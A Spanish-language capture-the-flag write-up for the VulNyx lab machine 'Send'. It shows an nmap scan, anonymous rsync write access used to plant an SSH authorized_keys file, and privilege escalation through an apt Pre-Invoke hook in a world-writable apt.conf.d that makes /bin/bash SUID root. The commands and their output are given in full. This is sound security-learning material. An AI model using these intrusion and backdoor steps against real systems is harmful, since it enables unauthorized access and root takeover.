cd ~/blog

~/writeups/vulnyx/15-send.md

15 - Send

easy Linux vulnyx 13-02-2025
rsync Anonymous Access (authorized_keys write)Writable /etc/apt/apt.conf.d (apt hook Privesc)
vulnyx.com

~1 min de lectura


Enumeramos puertos:

 sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.62
 nmap -sCV -p 22,80,873 -oN 02-targeted.txt 192.168.1.62
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-13 21:17 -03
Nmap scan report for 192.168.1.62
Host is up (0.00030s latency).

PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
|   3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
|   256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_  256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp  open  http    Apache httpd 2.4.59 ((Debian))
|_http-server-header: Apache/2.4.59 (Debian)
|_http-title: Site doesn't have a title (text/html).
873/tcp open  rsync   (protocol version 31)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.71 seconds

El puerto 873 expone un demonio rsync. Listamos los módulos disponibles (rsync Anonymous Access):

 rsync rsync://192.168.1.62/
share          	wally (home)

Listamos el contenido del módulo share (el home de wally) y comprobamos que tenemos escritura subiendo un archivo de prueba:

 rsync -av file.txt rsync://192.168.1.62/share/

 rsync rsync://192.168.1.62/share/

drwx------          4.096 2025/02/13 21:24:04 .
lrwxrwxrwx              9 2023/04/23 03:34:26 .bash_history
-rw-------            220 2023/01/15 09:58:06 .bash_logout
-rw-------          3.526 2023/01/15 09:58:06 .bashrc
-rw-------            807 2023/01/15 09:58:06 .profile
-rw-r--r--              0 2025/02/13 21:22:19 file.txt
-r--------             33 2024/07/11 11:34:21 user.txt
drwxr-xr-x          4.096 2023/04/29 09:50:29 .local

Como podemos escribir en el home, subimos un directorio .ssh con nuestro authorized_keys para acceder por SSH:

 rsync -av --mkpath .ssh/ rsync://192.168.1.62/share/.ssh

Nos conectamos con nuestra clave y obtenemos la primera flag:

 ssh wally@192.168.1.62 -i rsync/.ssh/id_rsa
Enter passphrase for key 'rsync/.ssh/id_rsa': 1234
wally@send:~$

Para escalar privilegios, monitorizamos con pspy64 y descubrimos que root ejecuta apt-get update. Comprobamos que el directorio de configuración de apt es escribible:

wally@send:/tmp$ ls -l /etc/apt
...
drwxrwxrwx 2 root root 4096 jul 11  2024 apt.conf.d
...

Creamos un hook de apt (Pre-Invoke) que asigna el bit SUID a Bash, que se ejecutará la próxima vez que corra apt:

wally@send:/etc/apt/apt.conf.d$ echo 'apt::Update::Pre-Invoke {"chmod u+s /bin/bash"};' > pwned

wally@send:/etc/apt/apt.conf.d$ ls -l /bin/bash
-rwsr-xr-x 1 root root 1234376 mar 27  2022 /bin/bash

wally@send:/etc/apt/apt.conf.d$ bash -p
bash-5.1# whoami
root

Obtenemos la flag y fin.

Machine rooted ✓

user & root flags capturados — redactados en el sitio público

// relacionados